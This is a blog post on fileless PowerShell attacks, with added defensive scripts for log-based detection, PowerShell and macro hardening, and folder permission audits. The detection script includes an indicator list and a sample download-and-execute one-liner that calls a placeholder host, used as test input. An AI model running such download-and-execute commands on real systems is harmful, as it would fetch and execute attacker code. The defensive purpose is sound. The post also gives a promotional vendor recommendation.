2017 will be remembered as the year of large-scale, coordinated network attacks across every sector of business. Ransomware such as WannaCry, NotPetya and Bad Rabbit led the assault on businesses and infrastructure worldwide, affecting not only small and large businesses but hospitals, ATMs and other computer network infrastructure that we take for granted. Other infections are taking hold as well, undetected and hiding in plain sight.
What is a "fileless" Attack?
A fileless attack is one in which attackers use software already present on the network to carry out malicious activity. These are usually "allowed" programs and protocols that anti-malware and antivirus tools do not flag, because they are considered "safe" applications. An example is Microsoft Windows PowerShell, a command-line utility that exists in all versions of Windows. PowerShell can be started in memory and fed several lines of instructions, including instructions that bypass local security settings, and it can connect to external sites to download and execute further scripts, giving the attacker ever-increasing access to your network. Because this type of attack creates no file on disk, antivirus software that scans files has nothing to find. The attack can remain in memory, or embed itself in the Windows registry or the kernel (operating system), and it may lodge itself there permanently so that it persists and continues through reboots.
An Example of How This Happens
You're at your computer at work and receive an email that is cleverly disguised spam. You click a link that takes you to a website that loads Flash Player. Flash then starts PowerShell in memory (you don't see it, but it is running in the background) and sends it a series of command-line instructions. This all happens in an instant; you never see a window pop up or a warning. PowerShell then connects to a server on the internet and runs a malicious script that finds sensitive data on your machine and sends it back to the attacker. All the while, no malware file is downloaded, and your antivirus and anti-malware scanners detect nothing.
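The scenario above leaves no file for a scanner, but it does leave the command text itself if PowerShell script block logging is switched on. The following is an added example, not code from the original post, that flags script-block log entries showing the in-memory download-and-execute pattern described above. It assumes script block logging is enabled (so blocks land in the Microsoft-Windows-PowerShell/Operational log as Event ID 4104); the indicator list, the two-hit threshold and the sample messages are constructed for illustration.

```powershell
# Added example (not from the original post). Assumes Script Block Logging is enabled so
# that PowerShell records what it runs as Event ID 4104 in Microsoft-Windows-PowerShell/Operational.

# Constructed indicator list: strings that show up when PowerShell is used as a download
# and execute engine rather than for administration. A hit is a reason to look, not proof.
$Indicators = @(
    'DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'Net.WebClient',
    'Invoke-Expression', 'IEX', '-EncodedCommand', 'FromBase64String',
    '-WindowStyle Hidden', '-w hidden', '-NoProfile', '-ExecutionPolicy Bypass'
)

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptText)
    # -match is case-insensitive; escape each indicator so it is matched literally.
    $hits = @(foreach ($i in $Indicators) {
        if ($ScriptText -match [regex]::Escape($i)) { $i }
    })
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2)   # require two indicators to cut down on noise
        Indicators = $hits
        Text       = $ScriptText
    }
}

# Live use: pull recent 4104 events and keep the ones that trip the check.
function Get-SuspiciousScriptBlockEvent {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $r = Test-SuspiciousScriptBlock -ScriptText $_.Message
            if ($r.Suspicious) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Indicators = ($r.Indicators -join ', ')
                    Text       = $_.Message
                }
            }
        }
}

# Constructed sample script-block texts (not real log data) so the check can be tried offline.
$Samples = @(
    "Get-ChildItem C:\Reports | Where-Object Length -gt 1MB",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')",
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <constructed-placeholder>"
)
foreach ($s in $Samples) {
    $r   = Test-SuspiciousScriptBlock -ScriptText $s
    $tag = if ($r.Suspicious) { 'ALERT' } else { 'ok   ' }
    '{0} [{1}] {2}' -f $tag, ($r.Indicators -join ', '), $s
}
```

The first sample is ordinary administration and passes; the second and third each trip three indicators and are reported. On a real host, run Get-SuspiciousScriptBlockEvent and forward the output to whatever collects your logs; the 4104 message text is the de-obfuscated script, so encoded commands are visible in it.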
What Your Company Can Do to Prevent These Attacks
If your organization does not use scripting languages, restrict their use by disabling them altogether. Preventing tools like PowerShell from running for ordinary users will help harden your internal defenses.
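What "disabling" PowerShell means in practice is a policy decision, so the following added example (not code from the original post) shows the host-level steps that apply whether or not PowerShell stays available: remove the old 2.0 engine, which has no logging, turn on the logging that makes in-memory activity visible, and report the resulting state. It assumes a Windows 10 or Server 2016 or later host and writes the same registry values the corresponding Group Policy settings use; the transcript directory is a placeholder. Fully blocking PowerShell for standard users is done with an application-control policy (AppLocker or Windows Defender Application Control), which is outside this snippet.

```powershell
# Added example (not from the original post). Run from an elevated session. Assumption:
# settings are written to the local policy registry keys that the matching Group Policy
# settings use; in a domain, deploy the same values through GPO instead.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 1. Remove the PowerShell 2.0 engine. It predates script block logging, so anything run
#    through it leaves no record of the in-memory commands.
#    On Windows Server use instead: Uninstall-WindowsFeature -Name PowerShell-V2
Get-WindowsOptionalFeature -Online |
    Where-Object { $_.FeatureName -like 'MicrosoftWindowsPowerShellV2*' -and $_.State -eq 'Enabled' } |
    ForEach-Object { Disable-WindowsOptionalFeature -Online -FeatureName $_.FeatureName -NoRestart | Out-Null }

# 2. Log what PowerShell actually runs. Script block logging records the de-obfuscated command
#    text as Event ID 4104 in Microsoft-Windows-PowerShell/Operational, so code that never
#    touches disk still leaves an audit trail. Transcription writes a full session record;
#    the directory is a placeholder and should ideally be a write-only network share.
Set-PolicyValue "$PolicyRoot\ScriptBlockLogging"        'EnableScriptBlockLogging' 1
Set-PolicyValue "$PolicyRoot\ModuleLogging"             'EnableModuleLogging'      1
Set-PolicyValue "$PolicyRoot\ModuleLogging\ModuleNames" '*' '*' 'String'
Set-PolicyValue "$PolicyRoot\Transcription"             'EnableTranscripting'      1
Set-PolicyValue "$PolicyRoot\Transcription"             'OutputDirectory' 'C:\PSTranscripts' 'String'

# 3. What this does not do: Set-ExecutionPolicy is a safety rail for administrators, not a
#    security boundary, and is not relied on here. Blocking PowerShell for standard users
#    needs an application-control policy (AppLocker / WDAC), which also places any PowerShell
#    that still runs into Constrained Language Mode.

function Get-PowerShellHardeningState {
    $v2 = Get-WindowsOptionalFeature -Online |
          Where-Object { $_.FeatureName -like 'MicrosoftWindowsPowerShellV2*' -and $_.State -eq 'Enabled' }
    [pscustomobject]@{
        V2EngineEnabled    = [bool]$v2
        ScriptBlockLogging = (Get-ItemProperty "$PolicyRoot\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
        Transcription      = (Get-ItemProperty "$PolicyRoot\Transcription"      -ErrorAction SilentlyContinue).EnableTranscripting -eq 1
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode   # FullLanguage unless app control is in force
    }
}

Get-PowerShellHardeningState
```

Run Get-PowerShellHardeningState on a sample of workstations before and after rollout; a LanguageMode of FullLanguage with no application-control policy means users can still run arbitrary PowerShell, only now with a log of it.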
Another way to help defend your network is to use an industry-grade firewall; if you are a small business, you should have one anyway. We recommend SonicWALL firewalls, because they provide digital defense tools at the gateway that stop most any type of attack, including Advanced Threat Protection (ATP). This type of firewall service analyzes items entering the network (including attachments) for harmful content. The data is analyzed, and the results are sent back to the firewall in real time with an instruction either to let the item pass or to block it.
Restrict access to your sensitive data by using Windows security on folders, and give users access only to what they need. Password-protect individual files (PDFs, Word and Excel documents) that contain sensitive data.
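The following added example (not code from the original post) applies the folder rule above to one share and then audits for the over-broad grants that usually creep in. The folder path and the group names are constructed placeholders; it is meant to run from an elevated session on the file server.

```powershell
# Added example (not from the original post). Folder path and group names are placeholders.

$Folder = 'D:\Shares\Finance'        # placeholder share
$Group  = 'CONTOSO\Finance-Users'    # placeholder domain group of the people who need the data

# Break inheritance first so grants made higher up the tree (commonly BUILTIN\Users:Read on
# the drive root) stop flowing down, then grant only the principals that need access.
# (OI)(CI) = also applies to files and subfolders; M = modify, F = full control.
icacls $Folder /inheritance:r
icacls $Folder /grant:r "${Group}:(OI)(CI)M" "BUILTIN\Administrators:(OI)(CI)F" "NT AUTHORITY\SYSTEM:(OI)(CI)F"
icacls $Folder /remove:g "Everyone" "BUILTIN\Users" "NT AUTHORITY\Authenticated Users"

# Audit: list Allow entries for catch-all groups anywhere under a path, so "give users only
# what they need" can be checked rather than assumed.
function Get-BroadAccessEntries {
    param([Parameter(Mandatory)][string]$Path)
    $catchAll = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                'NT AUTHORITY\INTERACTIVE', 'CONTOSO\Domain Users'   # last entry is a placeholder
    $dirs = @(Get-Item -Path $Path) + @(Get-ChildItem -Path $Path -Recurse -Directory -ErrorAction SilentlyContinue)
    foreach ($d in $dirs) {
        foreach ($ace in (Get-Acl -Path $d.FullName).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and $catchAll -contains $ace.IdentityReference.Value) {
                [pscustomobject]@{
                    Path      = $d.FullName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

Get-BroadAccessEntries -Path $Folder | Format-Table -AutoSize
```

An empty audit result is the goal for a sensitive share. Entries with Inherited set to True point at a parent folder that was never locked down; entries with Inherited False were added by hand and need an owner.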
Disable macros in Office programs if you don't use them. If you do use them, have the ones you use digitally signed. That way users can run only macros that have been reviewed and approved for use by the company.
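The following added example (not code from the original post) enforces the macro rule above through the per-user Office policy registry keys, the same values the Office Group Policy templates write. It assumes Office 2016, 2019 or Microsoft 365 (version key 16.0); the certificate path is a placeholder, and in a domain the values would be delivered by GPO rather than run per user.

```powershell
# Added example (not from the original post). Assumes Office version key 16.0.

$Apps = 'Word', 'Excel', 'PowerPoint'

# VBAWarnings: 1 = enable all macros, 2 = disable with notification (the default),
#              3 = disable all except digitally signed macros, 4 = disable all silently.
# Use 4 where macros are not used at all; 3 is the "signed and approved only" rule.
$VbaWarnings = 3

foreach ($app in $Apps) {
    $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'VBAWarnings' -Value $VbaWarnings -PropertyType DWord -Force | Out-Null
    # Independently block macros in files carrying the Mark of the Web (email attachments,
    # downloads), which is how the phishing scenario above would deliver them.
    New-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Value 1 -PropertyType DWord -Force | Out-Null
}

# With VBAWarnings = 3 a signed macro runs only if its signing certificate is in the user's
# Trusted Publishers store, so the company code-signing certificate goes there (placeholder path):
# Import-Certificate -FilePath 'C:\Certs\company-codesign.cer' -CertStoreLocation 'Cert:\CurrentUser\TrustedPublisher'

function Get-MacroPolicy {
    foreach ($app in $Apps) {
        $p = Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security" -ErrorAction SilentlyContinue
        [pscustomobject]@{
            App               = $app
            VBAWarnings       = $p.VBAWarnings
            BlockFromInternet = $p.blockcontentexecutionfrominternet
        }
    }
}

Get-MacroPolicy | Format-Table -AutoSize
```

Because the values live under the Policies hive, users cannot change them from the Trust Center, which is the point: the approved, signed macros keep working and everything else is silently blocked.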
Most importantly, make sure your Windows operating systems (workstations and servers) are patched at least monthly, and that all your third-party programs (Flash, Chrome, etc.) are included in that patching process. The Equifax breach, as we reported earlier this year, could easily have been prevented, as could most of the WannaCry outbreak. Basic security measures and some common sense are usually all that is required. What keeps us up at night is that these basic practices are usually ignored.